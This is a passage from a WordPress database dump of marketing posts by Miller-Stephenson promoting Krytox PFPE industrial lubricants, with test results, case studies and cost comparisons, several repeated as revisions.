failures by nearly 98% (reducing replacements from 186 bearings each year to four). By switching to PFPEs, this copper rod manufacturer reduced maintenance costs, parts costs and production downtime.\r\n<h4><strong>The Choice is Clear with Krytox Industrial Lubricants</strong></h4>\r\nTraditionally, PFPEs have been only considered for applications running in extreme conditions. Today, more customers are realizing the benefits of PFPE lubrication in the more mundane applications where they had never been considered before. Krytox™ lubricants, a type of PFPE, provides exceptional value in use across a wide range of applications.\r\n\r\nHigh performing PFPE lubricants cost more per unit than hydrocarbon lubricants; however, the exceptional benefits of PFPE outweigh the costs: PFPEs cut maintenance costs, reduce part replacement costs and help reclaim lost opportunity.\r\n<h4><strong>Estimate Whether You Should Switch to PFPEs</strong></h4>\r\n<ol>\r\n 	<li><strong>Calculate Staff Opportunity Cost</strong>\r\nEstimate the time your company spends on maintaining lubricated parts. (What if the personnel were assigned elsewhere in the plant, if they did not have to do re-lubrication?)</li>\r\n 	<li><strong>Estimate All the Maintenance Costs</strong>\r\nAdd up all the costs of re-lubricating equipment, e.g., electric motors, including the cost of staff time, lubrication supplies and part replacement.</li>\r\n 	<li><strong>Add Up the Opportunity Costs</strong>\r\nEstimate the amount of downtime caused by re-lubrication and unscheduled lubrication due to equipment failures. Then, estimate the value of the product your company could have produced. Multiply the product sales volume by your product gross margin amount.</li>\r\n 	<li><strong>Contact a PFPE Manufacturer or Supplier</strong>\r\nFor example, Miller-Stephenson, which distributes Krytox™ lubricants, to calculate the savings available by switching to PFPE lubricants.</li>\r\n</ol>', 'Industrial Lubricants That Can Reduce Production Downtime', '', 'inherit', 'closed', 'closed', '', '3744-revision-v1', '', '', '2017-02-28 16:21:33', '2017-02-28 16:21:33', '', 3744, 'https://www.miller-stephenson.com/3744-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3752, 2, '2017-02-28 16:24:04', '2017-02-28 16:24:04', '<h2>Comparing Industrial Lubricants - Downsides of Hydrocarbons</h2>\r\n<h3>Petroleum-Based and Synthetic Hydrocarbon Lubricants vs. Krytox (PFPEs)</h3>\r\nWhile industrial lubricants only make up 1% of plant operational costs, the lack of proper lubrication or application can have an adverse impact on total maintenance costs and downtime. More than half of the total maintenance costs, as well as a cause of downtime, is directly related to one of the smallest budgeted items.\r\n\r\nThe ultimate industrial lubricant is one that lasts a long time and “just works.” That means it works just as well under normal temperature conditions, as well as in an extremely hot environment; or when faced with harsh chemicals, like boiling sulfuric acid.\r\n\r\nOne class of non-traditional synthetic industrial lubricants – perfluoropolyether (PFPE) lubricants – provides longerlasting performance, which results in reduced wear and tear for machine parts, lower maintenance costs and fewer production delays, even in the harshest environments.\r\n\r\nParts and equipment generally require more maintenance and capital reinvestment in environments where extreme temperatures and pressures are combined with harsh chemicals and conditions. Traditionally used petroleumbased hydrocarbon lubricants break down and fail at extreme temperatures with pressure and chemical exposures, requiring more frequent machine maintenance and causing shorter parts lifespans. Traditional synthetic industrial lubricants may provide only marginally better results.\r\n\r\nPFPE lubricants are proven to provide the broadest benefits, even in the most extreme conditions without breaking down. Using PFPE reduces equipment failure, maintenance cost, parts replacement and labor costs. More importantly, it reduces production downtime.\r\n\r\nThough more expensive than petroleum-based and other traditional synthetic industrial lubricants, PFPEs provide a short payback period and long-term benefits.\r\n<h4><strong>Stable Performance in Harsh Environments</strong></h4>\r\nOne of the greatest advantages of using PFPE lubricants is stability across a wide variety of operating conditions and environments. This inert nature is what allows PFPE greases and oils to outlast and outperform competing traditional synthetic and hydrocarbon products.\r\n\r\nIn addition to PFPE lubricants being chemically inert compared to virtually all chemicals commonly used in most industries, they are also water and oil repellent, solvent resistant, nonflammable, compatible with oxygen and reactive gases and non-toxic. And, they are compatible with most common elastomers, plastics and metals.\r\n\r\nEven with PFPEs having such extreme capabilities, they are completely safe to handle. When comparing the MSDS of Krytox™ lubricant, a type of PFPE lubricant, to the MSDS of sugar, sugar is more dangerous to handle.\r\n\r\nUsing PFPE lubricants can contribute significantly to lowering the cost of doing business – industries, such as aerospace, automotive and chemical, have used PFPEs with exceptional performance and reliability in the toughest conditions, where productivity matters and downtime is costly.\r\n<h4><strong>Extreme Compatibility</strong></h4>\r\nPFPE lubricants are stable and effective among other lubricants as well as steam, moisture and harsh chemicals. Because of their chemically inert properties, PFPE lubricants are safe to use with more than 100 different chemicals without degradation, including boiling sulfuric acid.\r\n\r\n<strong>Can Your Industrial Lubricant Stand t<img class="wp-image-3745 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/Krytox-Temperature-Comparison.jpg" alt="krytox-temperature-comparison" width="488" height="296" />he Heat?</strong>\r\n\r\nAs machine operating temperatures rise above 120 °C or fall below 0 °C, petroleum-based lubricants begin to fail, forcing costly re-lubrication and production interruption. Conventional synthetic lubricants (esters, polyalkylene glycols and polyalphaolefins) don’t perform much better. Krytox™ PFPE industrial lubricants are stable up to 350 °C and down to - 75 °C.\r\n\r\n<strong>Extreme Temperature Side by Side</strong>\r\n\r\nIn a side-by-side high temperature test, hydrocarbon and PFPE (Krytox™ GPL 227) grease were placed in an oven at 232 °C (450 °F) for 40 hours. The hydrocarbon grease lost 40 percent of its weight (ceasing to be an effective lubricant), and developed tar. Krytox™, the PFPE grease, remained unchanged in weight and appearance (lubricating ability fully intact).\r\n<h4><strong>Extreme Pressure (EP)</strong></h4>\r\n[caption id="attachment_3747" align="alignright" width="440"]<img class="wp-image-3747" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-vs-hydrocarbon.jpg" alt="krytox-vs-hydrocarbon" width="440" height="273" /> Krytox vs Standard Industrial Lubricants[/caption]\r\n\r\nPFPE greases with extreme pressure additives have high load-carrying capability and good lubrication characteristics under boundary and mixed friction conditions, making them ideal for use in high loading and slow speed conditions. In addition, PFPE oils provide inherent extreme pressure performance based on their unique chemistry.\r\n<h4><strong>Several tests have proven that PFPEs outperform and outlast hydrocarbon lubricants</strong></h4>\r\nIn a Pin and Vee Block Test (<a href="https://www.astm.org/Standards/D3233.htm">ASTM D-3233</a>) – an evaluation of wear, friction and extreme pressure – Krytox™ (PFPE) lubricants reached the maximum load in the test, while hydrocarbon lubricants displayed signs of extreme wear and often caused a catastrophic early failure.\r\n\r\nPFPE lubricants again outperformed hydrocarbon lubricants in a four ball extreme pressure test (<a href="https://www.astm.org/Standards/D2596.htm">ASTM D-2596</a>), which measures a lubricant’s performance under extreme pressure using a point contact sliding motion. Petroleum greases have a load wear index (LWI) of approximately 50, and synthetic hydrocarbons have LWIs close to 100. PFPEs were stable at LWIs more than twice the LWIs of hydrocarbon lubricants and matching or exceeding the LWIs of synthetic hydrocarbons.\r\n\r\nAnother test steadily increases the load on a rotating steel ball in contact with 3 fixed balls until they seize and welding occurs, which simulates point contact conditions. The lowest load (Weld Point) data is used to calculate the value of how well the grease prevents wear when operating below the weld point. For many competing greases, the LWI can generally fall between 50 and 100, but Krytox™ greases typically have an LWI well above 100, further illustrating how Krytox™ grease can outperform most competitive greases in both extreme pressure and extreme condition performance.\r\n\r\n[caption id="attachment_3746" align="alignleft" width="462"]<img class="wp-image-3746" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-astm-grease-life-test.jpg" alt="krytox-astm-grease-life-test" width="462" height="345" /> Krytox vs Other Industrial Lubricants[/caption]\r\n<h4><strong>The Test of Time</strong></h4>\r\nPFPEs outlasted hydrocarbons in the <a href="https://www.astm.org/Standards/D3336.htm">ASTM D-3336</a> test, which evaluates the endurance life of greases in ball bearings by rotating a bearing at a set speed and temperature. At 10,000 revolutions per minute (rpm) and about 177 °C (350°F), all tested hydrocarbon lubricants failed in less than 1,000 hours. <a href="https://www.miller-stephenson.com/product/krytox-aut-2e45/">Krytox™ AUT 2E45</a> grease performed for more than 25,000 hours – the equivalent of almost three years – without failing. The test was stopped before the lubricant failed.\r\n<h4><strong>Case Study: Copper Rod Manufacturer’s Experience</strong></h4>\r\nBefore using PFPEs, a copper rod manufacturer believed lubricating its rollers’ bearings (operating temperatures over 200 °C [400 °F]) every four hours with a synthetic hydrocarbon grease was the longest lasting solution available. By switching to a PFPE lubricant (Krytox™ XHT-BDX lubricant), they lowered re-lubrication to a monthly basis and cut annual bearing failures by nearly 98% (reducing replacements from 186 bearings each year to four). By switching to PFPEs, this copper rod manufacturer reduced maintenance costs, parts costs and production downtime.\r\n<h4><strong>The Choice is Clear with Krytox Industrial Lubricants</strong></h4>\r\nTraditionally, PFPEs have been only considered for applications running in extreme conditions. Today, more customers are realizing the benefits of PFPE lubrication in the more mundane applications where they had never been considered before. Krytox™ lubricants, a type of PFPE, provides exceptional value in use across a wide range of applications.\r\n\r\nHigh performing PFPE lubricants cost more per unit than hydrocarbon lubricants; however, the exceptional benefits of PFPE outweigh the costs: PFPEs cut maintenance costs, reduce part replacement costs and help reclaim lost opportunity.\r\n<h4><strong>Estimate Whether You Should Switch to PFPEs</strong></h4>\r\n<ol>\r\n 	<li><strong>Calculate Staff Opportunity Cost</strong>\r\nEstimate the time your company spends on maintaining lubricated parts. (What if the personnel were assigned elsewhere in the plant, if they did not have to do re-lubrication?)</li>\r\n 	<li><strong>Estimate All the Maintenance Costs</strong>\r\nAdd up all the costs of re-lubricating equipment, e.g., electric motors, including the cost of staff time, lubrication supplies and part replacement.</li>\r\n 	<li><strong>Add Up the Opportunity Costs</strong>\r\nEstimate the amount of downtime caused by re-lubrication and unscheduled lubrication due to equipment failures. Then, estimate the value of the product your company could have produced. Multiply the product sales volume by your product gross margin amount.</li>\r\n 	<li><strong>Contact a PFPE Manufacturer or Supplier</strong>\r\nFor example, Miller-Stephenson, which distributes Krytox™ lubricants, to calculate the savings available by switching to PFPE lubricants.</li>\r\n</ol>', 'Industrial Lubricants That Can Reduce Production Downtime', '', 'inherit', 'closed', 'closed', '', '3744-revision-v1', '', '', '2017-02-28 16:24:04', '2017-02-28 16:24:04', '', 3744, 'https://www.miller-stephenson.com/3744-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3753, 2, '2017-02-28 16:47:01', '2017-02-28 16:47:01', '<h2><strong>The Secret Competitive Advantage of High Performance Lubricants</strong></h2>\r\nHigh performance lubricants offer long lasting performance capabilities, despite harsh environmental conditions (e.g., extreme temperatures, extreme pressure, chemical exposure, etc.), minimizing the risk of failures, increasing end user satisfaction and enabling you to offer extended warranties with fewer claims. It’s a solution that benefits you and your end users.\r\n\r\n<img class="wp-image-3754 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-lubricant-comparison.jpg" alt="krytox-lubricant-comparison" width="868" height="361" />\r\n\r\nPerfluoropolyether (PFPE) high performance lubricants offer the broadest performance capabilities. PFPEs can help increase equipment quality, decrease warranty claims and even extend lifespan projections.\r\n<h4><strong>Krytox PFPEs are Reliable</strong></h4>\r\nPFPEs boast a much longer performance life than hydrocarbon greases due to the unique chemistry. In an endurance ASTM test, PFPEs outperformed traditional lubricants, lasting more than five times as long. In fact, some components require only a single application and are “lubed for life.” Additionally, PFPEs achieve this lasting performance using significantly\r\nless lubricant per application.\r\n<h4><strong>Krytox PFPEs are Broadly Compatible</strong></h4>\r\nUnlike almost all lubricants, PFPEs are chemically inert, meaning they do\r\nnot react with chemicals or materials. Even in 100% liquid or gaseous oxygen, PFPEs will not burn. Even in 100% liquid or gaseous oxygen, PFPEs will not burn. This lubricant class is also non-toxic, offering several medical- and food-grade lubricants, and environmentally friendly, no hazardous VOCs and the oils are recyclable.\r\n<h4><strong>Krytox PFPEs are Safe</strong></h4>\r\nThese lubricants remain stable over a broad temperature range, from -75 °C to 350 °C (-103 °F to 662 °F). A high temperature <a href="https://www.astm.org/">ASTM</a> test was actually stopped before the PFPE lubricant ever failed. Likewise, in an\r\nextreme pressure ASTM test, PFPE samples maxed the load limit of the test apparatus without failure.\r\n<h4><strong>Total Cost of Ownership Advantage</strong></h4>\r\nAccording to <a href="http://www.powermag.com/">Power Magazine</a>, lubricants make up less than 1 percent of a plant’s operating cost, but can directly influence more than half of plant maintenance costs. Combine that with the corresponding downtime and productivity loss, and lubricant selection has a significant impact on end user total cost of ownership (TCO).\r\n\r\nPFPE’s stable, lasting performance under harsh conditions can help generate significant savings over the equipment lifespan. In fact, one annual cost comparison between a PFPE and a conventional hydrocarbon lubricant found the PFPE cost 23.5% less ($1,772 vs. $2,250).ii\r\n\r\n<img class="alignnone wp-image-3755" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-operating-costs.jpg" alt="krytox-operating-costs" width="1043" height="373" />\r\n<h4><strong>About Krytox™ PFPE Lubricants</strong></h4>\r\nKrytox™ lubricants are Chemours’ line of high quality PFPE oils and greases, which have been proven to offer long-term performance and superior value. These lubricants are PFPEs, resulting in exceptional\r\nchemical stability. Therefore, they are thermally stable, nonflammable and insoluble in water, acids, bases, and most organic and all non-fluorinated solvents.\r\n\r\nAdditionally, Krytox™ lubricants are ISO 9001 and ISO 14001 certified, and several grades are NSF H-1.\r\n\r\n<strong>The attributes of Krytox™ lubricants include:</strong>\r\n\r\n<strong>Performance over a wide temperature range</strong>\r\nExtreme heat or cold have no effect on the lubricity of these lubricants, effective from -75 °C to greater than 400 °C (-103 °F to 752 °F), depending upon operating conditions and product grade.\r\n\r\n<strong>Resistant to chemical attack</strong>\r\nKrytox™ lubricants withstand oxygen, acids and other aggressive substances.\r\n\r\n<strong>Low evaporation</strong>\r\nKrytox™ lubricants – within the recommended temperature ranges – experience almost zero evaporation or chemical changes over the many years of a machine’s service life.\r\n\r\n<strong>Compatibility</strong>\r\nKrytox™ lubricants won’t harm painted surfaces or most elastomeric materials. They are compatible with almost every material they may contact.\r\n\r\nFor more products and information, <a href="https://www.miller-stephenson.com/krytox/">click here</a>. Miller-Stephenson also provides <a href="https://www.miller-stephenson.com/tech-support/">technical assistance.</a>\r\n\r\n<span style="font-size: 130%;">[share title=""]</span>\r\n\r\n<span style="font-size: 75%;">i. Matt Mowry, “The True Cost of Bearing Lubrication,” Power Transmission Engineering, June 2015 (http://www.powertransmission.com/articles/0615/The_True_Cost_of_Bearing_Lubrication).</span>\r\n\r\n<span style="font-size: 75%;">ii.Mike Johnson, “Machine Lubrication Best Practices Volume 29: Lubricant Application: High Technology Lubricants –Cost vs. Performance,” Tribology and Lubrication Transactions, a STLE Publication, May 2010 (http://www.lelubricants.com/lit/news/Articles/best_practice.pdf).</span>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'High Performance Lubricants', '', 'publish', 'closed', 'closed', '', 'high-performance-lubricants', '', '', '2017-03-01 13:44:36', '2017-03-01 13:44:36', '', 0, 'https://www.miller-stephenson.com/?p=3753', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (3754, 2, '2017-02-28 16:29:44', '2017-02-28 16:29:44', '', 'krytox-lubricant-comparison', '', 'inherit', 'closed', 'closed', '', 'krytox-lubricant-comparison', '', '', '2017-02-28 16:29:44', '2017-02-28 16:29:44', '', 3753, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-lubricant-comparison.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3755, 2, '2017-02-28 16:41:03', '2017-02-28 16:41:03', '', 'krytox-operating-costs', '', 'inherit', 'closed', 'closed', '', 'krytox-operating-costs', '', '', '2017-02-28 16:41:03', '2017-02-28 16:41:03', '', 3753, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-operating-costs.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3756, 2, '2017-02-28 16:46:39', '2017-02-28 16:46:39', '', 'high performance lubricants', '', 'inherit', 'closed', 'closed', '', 'high-performance-lubricants', '', '', '2017-02-28 16:46:54', '2017-02-28 16:46:54', '', 3753, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/high-performance-lubricants.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3757, 2, '2017-02-28 16:47:01', '2017-02-28 16:47:01', '<h2><strong>The Secret Competitive Advantage of High Performance Lubricants</strong></h2>\r\nHigh performance lubricants offer long lasting performance capabilities, despite harsh environmental conditions (e.g., extreme temperatures, extreme pressure, chemical exposure, etc.), minimizing the risk of failures, increasing end user satisfaction and enabling you to offer extended warranties with fewer claims. It’s a solution that benefits you and your end users.\r\n\r\n<img class="wp-image-3754 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-lubricant-comparison.jpg" alt="krytox-lubricant-comparison" width="868" height="361" />\r\n\r\nPerfluoropolyether (PFPE) high performance lubricants offer the broadest performance capabilities. PFPEs can help increase equipment quality, decrease warranty claims and even extend lifespan projections.\r\n<h4><strong>Krytox PFPEs are Reliable</strong></h4>\r\nPFPEs boast a much longer performance life than hydrocarbon greases due to the unique chemistry. In an endurance ASTM test, PFPEs outperformed traditional lubricants, lasting more than five times as long. In fact, some components require only a single application and are “lubed for life.” Additionally, PFPEs achieve this lasting performance using significantly\r\nless lubricant per application.\r\n<h4><strong>Krytox PFPEs are Broadly Compatible</strong></h4>\r\nUnlike almost all lubricants, PFPEs are chemically inert, meaning they do\r\nnot react with chemicals or materials. Even in 100% liquid or gaseous oxygen, PFPEs will not burn. Even in 100% liquid or gaseous oxygen, PFPEs will not burn. This lubricant class is also non-toxic, offering several medical- and food-grade lubricants, and environmentally friendly, no hazardous VOCs and the oils are recyclable.\r\n<h4><strong>Krytox PFPEs are Safe</strong></h4>\r\nThese lubricants remain stable over a broad temperature range, from -75 °C to 350 °C (-103 °F to 662 °F). A high temperature <a href="https://www.astm.org/">ASTM</a> test was actually stopped before the PFPE lubricant ever failed. Likewise, in an\r\nextreme pressure ASTM test, PFPE samples maxed the load limit of the test apparatus without failure.\r\n<h4><strong>Total Cost of Ownership Advantage</strong></h4>\r\nAccording to <a href="http://www.powermag.com/">Power Magazine</a>, lubricants make up less than 1 percent of a plant’s operating cost, but can directly influence more than half of plant maintenance costs. Combine that with the corresponding downtime and productivity loss, and lubricant selection has a significant impact on end user total cost of ownership (TCO).\r\n\r\nPFPE’s stable, lasting performance under harsh conditions can help generate significant savings over the equipment lifespan. In fact, one annual cost comparison between a PFPE and a conventional hydrocarbon lubricant found the PFPE cost 23.5% less ($1,772 vs. $2,250).ii\r\n\r\n<img class="alignnone  wp-image-3755" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-operating-costs.jpg" alt="krytox-operating-costs" width="1043" height="373" />\r\n<h4><strong>About Krytox™ PFPE Lubricants</strong></h4>\r\nKrytox™ lubricants are Chemours’ line of high quality PFPE oils and greases, which have been proven to offer long-term performance and superior value. These lubricants are PFPEs, resulting in exceptional\r\nchemical stability. Therefore, they are thermally stable, nonflammable and insoluble in water, acids, bases, and most organic and all non-fluorinated solvents.\r\n\r\nAdditionally, Krytox™ lubricants are ISO 9001 and ISO 14001 certified, and several grades are NSF H-1.\r\n\r\n<strong>The attributes of Krytox™ lubricants include:</strong>\r\n\r\n<strong>Performance over a wide temperature range</strong>\r\nExtreme heat or cold have no effect on the lubricity of these lubricants, effective from -75 °C to greater than 400 °C (-103 °F to 752 °F), depending upon operating conditions and product grade.\r\n\r\n<strong>Resistant to chemical attack</strong>\r\nKrytox™ lubricants withstand oxygen, acids and other aggressive substances.\r\n\r\n<strong>Low evaporation</strong>\r\nKrytox™ lubricants – within the recommended temperature ranges – experience almost zero evaporation or chemical changes over the many years of a machine’s service life.\r\n\r\n<strong>Compatibility</strong>\r\nKrytox™ lubricants won’t harm painted surfaces or most elastomeric materials. They are compatible with almost every material they may contact.\r\n\r\nFor more products and information, <a href="https://www.miller-stephenson.com/krytox/">click here</a>. Miller-Stephenson also provides <a href="https://www.miller-stephenson.com/tech-support/">technical assistance.</a>\r\n\r\n<span style="font-size: 75%;">i. Matt Mowry, “The True Cost of Bearing Lubrication,” Power Transmission Engineering, June 2015 (http://www.powertransmission.com/articles/0615/The_True_Cost_of_Bearing_Lubrication).</span>\r\n\r\n<span style="font-size: 75%;">ii.Mike Johnson, “Machine Lubrication Best Practices Volume 29: Lubricant Application: High Technology Lubricants –Cost vs. Performance,” Tribology and Lubrication Transactions, a STLE Publication, May 2010 (http://www.lelubricants.com/lit/news/Articles/best_practice.pdf).</span>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'High Performance Lubricants', '', 'inherit', 'closed', 'closed', '', '3753-revision-v1', '', '', '2017-02-28 16:47:01', '2017-02-28 16:47:01', '', 3753, 'https://www.miller-stephenson.com/3753-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3758, 2, '2017-02-28 16:47:53', '2017-02-28 16:47:53', '<h2><strong>The Secret Competitive Advantage of High Performance Lubricants</strong></h2>\r\nHigh performance lubricants offer long lasting performance capabilities, despite harsh environmental conditions (e.g., extreme temperatures, extreme pressure, chemical exposure, etc.), minimizing the risk of failures, increasing end user satisfaction and enabling you to offer extended warranties with fewer claims. It’s a solution that benefits you and your end users.\r\n\r\n<img class="wp-image-3754 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-lubricant-comparison.jpg" alt="krytox-lubricant-comparison" width="868" height="361" />\r\n\r\nPerfluoropolyether (PFPE) high performance lubricants offer the broadest performance capabilities. PFPEs can help increase equipment quality, decrease warranty claims and even extend lifespan projections.\r\n<h4><strong>Krytox PFPEs are Reliable</strong></h4>\r\nPFPEs boast a much longer performance life than hydrocarbon greases due to the unique chemistry. In an endurance ASTM test, PFPEs outperformed traditional lubricants, lasting more than five times as long. In fact, some components require only a single application and are “lubed for life.” Additionally, PFPEs achieve this lasting performance using significantly\r\nless lubricant per application.\r\n<h4><strong>Krytox PFPEs are Broadly Compatible</strong></h4>\r\nUnlike almost all lubricants, PFPEs are chemically inert, meaning they do\r\nnot react with chemicals or materials. Even in 100% liquid or gaseous oxygen, PFPEs will not burn. Even in 100% liquid or gaseous oxygen, PFPEs will not burn. This lubricant class is also non-toxic, offering several medical- and food-grade lubricants, and environmentally friendly, no hazardous VOCs and the oils are recyclable.\r\n<h4><strong>Krytox PFPEs are Safe</strong></h4>\r\nThese lubricants remain stable over a broad temperature range, from -75 °C to 350 °C (-103 °F to 662 °F). A high temperature <a href="https://www.astm.org/">ASTM</a> test was actually stopped before the PFPE lubricant ever failed. Likewise, in an\r\nextreme pressure ASTM test, PFPE samples maxed the load limit of the test apparatus without failure.\r\n<h4><strong>Total Cost of Ownership Advantage</strong></h4>\r\nAccording to <a href="http://www.powermag.com/">Power Magazine</a>, lubricants make up less than 1 percent of a plant’s operating cost, but can directly influence more than half of plant maintenance costs. Combine that with the corresponding downtime and productivity loss, and lubricant selection has a significant impact on end user total cost of ownership (TCO).\r\n\r\nPFPE’s stable, lasting performance under harsh conditions can help generate significant savings over the equipment lifespan. In fact, one annual cost comparison between a PFPE and a conventional hydrocarbon lubricant found the PFPE cost 23.5% less ($1,772 vs. $2,250).ii\r\n\r\n<img class="alignnone wp-image-3755" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-operating-costs.jpg" alt="krytox-operating-costs" width="1043" height="373" />\r\n<h4><strong>About Krytox™ PFPE Lubricants</strong></h4>\r\nKrytox™ lubricants are Chemours’ line of high quality PFPE oils and greases, which have been proven to offer long-term performance and superior value. These lubricants are PFPEs, resulting in exceptional\r\nchemical stability. Therefore, they are thermally stable, nonflammable and insoluble in water, acids, bases, and most organic and all non-fluorinated solvents.\r\n\r\nAdditionally, Krytox™ lubricants are ISO 9001 and ISO 14001 certified, and several grades are NSF H-1.\r\n\r\n<strong>The attributes of Krytox™ lubricants include:</strong>\r\n\r\n<strong>Performance over a wide temperature range</strong>\r\nExtreme heat or cold have no effect on the lubricity of these lubricants, effective from -75 °C to greater than 400 °C (-103 °F to 752 °F), depending upon operating conditions and product grade.\r\n\r\n<strong>Resistant to chemical attack</strong>\r\nKrytox™ lubricants withstand oxygen, acids and other aggressive substances.\r\n\r\n<strong>Low evaporation</strong>\r\nKrytox™ lubricants – within the recommended temperature ranges – experience almost zero evaporation or chemical changes over the many years of a machine’s service life.\r\n\r\n<strong>Compatibility</strong>\r\nKrytox™ lubricants won’t harm painted surfaces or most elastomeric materials. They are compatible with almost every material they may contact.\r\n\r\nFor more products and information, <a href="https://www.miller-stephenson.com/krytox/">click here</a>. Miller-Stephenson also provides <a href="https://www.miller-stephenson.com/tech-support/">technical assistance.</a>\r\n\r\n<span style="font-size: 130%;">[share title=""]</span>\r\n\r\n<span style="font-size: 75%;">i. Matt Mowry, “The True Cost of Bearing Lubrication,” Power Transmission Engineering, June 2015 (http://www.powertransmission.com/articles/0615/The_True_Cost_of_Bearing_Lubrication).</span>\r\n\r\n<span style="font-size: 75%;">ii.Mike Johnson, “Machine Lubrication Best Practices Volume 29: Lubricant Application: High Technology Lubricants –Cost vs. Performance,” Tribology and Lubrication Transactions, a STLE Publication, May 2010 (http://www.lelubricants.com/lit/news/Articles/best_practice.pdf).</span>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'High Performance Lubricants', '', 'inherit', 'closed', 'closed', '', '3753-revision-v1', '', '', '2017-02-28 16:47:53', '2017-02-28 16:47:53', '', 3753, 'https://www.miller-stephenson.com/3753-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3760, 2, '2017-02-28 19:16:31', '2017-02-28 19:16:31', '<h2><strong>How Manufacturers Have Reduced Downtime and Costs | PFPE Lubricant | Krytox</strong></h2>\r\nFrom equipment selection to maintenance cycles and troubleshooting, we know you work tirelessly to achieve peak plant performance every day. With the average plant using more than 2,000 bearings – in addition to the valves, seals and other PFPE lubricant reliant components – lubrication plays a critical role in plant performance.<img class="wp-image-3761 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2017/02/krytox-plant-savings.jpg" alt="krytox-plant-savings" width="273" height="303" />\r\n\r\nFinding a lubricant that can perform, even in the harshest of conditions, can help extend asset life, reduce downtime and control maintenance costs. Perfluoropolyether (PFPE) lubricants are proven to outperform traditional lubricants in four key areas: over time, under extreme pressures, in extreme heat and in extremely harsh conditions.\r\n\r\nLearn how four manufacturing plants were able to improve plant performance by switching to Krytox PFPE lubricants.\r\n<h4><strong>The Test of Time</strong></h4>\r\nPFPE lubricants have proven endurance over time at extreme temperatures. In fact, a British bottling plant was struggling to keep its labeling machine gearbox operating fulltime because shaft seals lasted only two weeks. This led to frequent unscheduled downtime and high maintenance costs. The company needed a lubricant that would withstand extremely high temperatures over time, minimize leakage from failing seals – which produced a food quality concern – and was safe for its employees.\r\n\r\nThe company selected a Krytox PFPE lubricant, which offers lasting performance at temperatures greater than 400 °C (752 °F). The solution worked so well that the gearbox is now changed every two years during routine plant maintenance.\r\n<h4><strong>The Test of Pressure</strong></h4>\r\nKrytox lubricants are also proven to outperform hydrocarbon lubricants under extreme pressure. A German manufacturer of exhaust gas recirculation (EGR) valves needed to improve product reliability. Operating under extreme pressure, in a broad temperature range (-40 °C to 200 °C [-40 °F to 392 °F]), with heavy vibrations, the valves regularly failed.\r\n\r\nA Krytox PFPE lubricant provided the answer the company needed – providing superior lubricity at the lowest temperatures, withstanding a rigorous vibration test and improving product reliability. The manufacturer estimates that the switch in lubricants saves nearly $90,000 annually.\r\n<h4><strong>The Test of Heat</strong></h4>\r\nNumerous tests have demonstrated PFPEs’ reliable performance under high heat, maintaining lubricity at temperatures greater than 400 °C (752 °F). A notable example comes from the ammonia industry. One company was plagued by frequent bearings failures in its reformer furnace blower due to the lithium grease decomposing at the high operating temperature (290 °C [554 °F]). The company sought out a chemically inert lubricant – capable of performing alongside ammonia – with a once-a-year re-lubrication cycle due to the maintenance safety risk, potential fire hazard involved with shutdown and production loss.\r\n\r\nA high-temperature PFPE lubricant, specially designed to provide optimal performance between 200 °C and 300 °C (392 °F and 572 °F), met the challenge. Because PFPEs are nonflammable and chemically inert, safety improved. As a result, the bearings in the reformer furnace blower do not lose lubricity and the maintenance schedule can remain confidently at 12 month intervals, reducing the company’s operating costs\r\nand safety risk.\r\n<h4><strong>The Test of Harshness</strong></h4>\r\nLastly, PFPE lubricants provide optimal performance in extreme conditions. A Taiwanese manufacturer struggled to adequately lubricate the pressure gauge within its chlorine piping system, part of a titanium dioxide manufacturing operation. Gauge failures threatened worker safety, resulted in downtime and increased maintenance expense.\r\n\r\nThe company searched for a replacement lube that was stable at high temperatures, resistant to chlorine gas and could handle the harsh operating environment. The company met the challenge by using a nonflammable PFPE lubricant with good high-temperature stability, providing long-term stability at operating temperatures up to 150 °C (302 °F).\r\n<h4><strong>About Krytox™ PFPE Lubricants</strong></h4>\r\nKrytox™ lubricants are Chemours’ line of high quality PFPE oils and greases, which have been proven to offer longterm performance and superior value. These lubricants are PFPEs, resulting in exceptional chemical stability. Therefore, they are thermally stable, nonflammable and insoluble in water, acids, bases, and most organic and all non-fluorinated solvents.\r\n\r\nAdditionally, Krytox™ lubricants are <a href="https://www.iso.org/iso-9001-quality-management.html">ISO 9001</a> and <a href="https://www.iso.org/iso-14001-environmental-management.html">ISO 14001</a> certified, and several grades are NSF H-1.\r\n<h4><strong>The attributes of Krytox™ lubricants include:</strong></h4>\r\n<strong>Performance over a wide temperature range</strong>\r\nExtreme heat or cold have no effect on the lubricity of these lubricants, effective from -75 °C to greater than 400 °C (-103 °F to 752 °F), depending upon operating conditions and product grade.\r\n\r\n<strong>Resistant to chemical attack</strong>\r\nKrytox™ lubricants withstand oxygen, acids and other aggressive substances.\r\n\r\n<strong>Low evaporation</strong>\r\nKrytox™ lubricants – within the recommended temperature ranges – experience almost zero evaporation or chemical changes over the many years of a machine’s service life.\r\n\r\n<strong>Compatibility</strong>\r\nKrytox™ lubricants won’t harm painted surfaces or most elastomeric materials. They are compatible with almost every 